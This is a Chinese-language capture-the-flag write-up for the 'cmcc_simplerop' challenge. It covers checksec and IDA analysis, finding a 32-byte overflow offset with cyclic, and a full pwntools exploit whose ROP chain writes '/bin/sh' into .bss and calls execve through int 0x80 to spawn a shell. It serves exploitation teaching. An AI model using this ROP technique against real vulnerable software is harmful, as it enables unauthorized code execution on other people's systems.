cmcc_simplerop解题过程

分析

使用checksec分析可知,simplerop只开启了NX保护,即栈不可执行,于是只能从其他内存空间下手。

接着使用IDA进行反汇编,分析代码可知该程序使用了read函数,即存在栈溢出漏洞,但是如果把shell放在栈上肯定是行不通的。与此同时,注意read()中的函数,其输入的v4在bss段,而bss段是可执行的。

到此,思路明确,我们可以通过read()函数把shell写入其中,然后通过执行bss段的shell来获取"/bin/sh"权限。

解题

  1. 先利用cyclic计算偏移
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

pwndbg> r
Starting program: /home/henhen/Desktop/challenges/simplerop/simplerop 
ROP is easy is'nt it ?
Your input :aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616169 in ?? ()

cyclic - l 0x61616169
32

得出偏移量为32

  1. 获取read函数地址,利用其写入ROP链,进行三次ret然后达成目的

ret流程图如下
cmcc_simplerop解题过程_第1张图片

最终exp如下

from pwn import *

p = process('./simplerop')

read_addr = 0x806CD50

int_80h_addr = 0x080493e1

pop_edx_ecx_ebx_ret = 0x0806e850

pop_eax_ret = 0x080bae06

bin_sh_addr = 0x80eb584

payload = b'a' * 0x20 + p32(read_addr) + p32(pop_edx_ecx_ebx_ret) 
payload += p32(0) + p32(bin_sh_addr) + p32(8) 
#将/bin/sh写入bss段,read(0,bin_sh_addr,8),
#                       fd    buf     size
#写完之后返回read函数,输入下面的payload
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bin_sh_addr) + p32(pop_eax_ret) + p32(0xb) + p32(int_80h_addr)
#将int_80(11,bin_sh_addr,0,0)写入bss段
#   系统调用号 缓冲区地址 

p.sendline(payload)

p.send("/bin/sh\x00")

p.interactive()


总结

对于该类静态编译的题目,可以利用其可读可执行段(.bss)地址不改变,然后通过构造ROP链进行攻击,这里主要利用int 0x80系统调用执行execve(“/bin/sh”)来达成获取权限的目的。

你可能感兴趣的:(网络)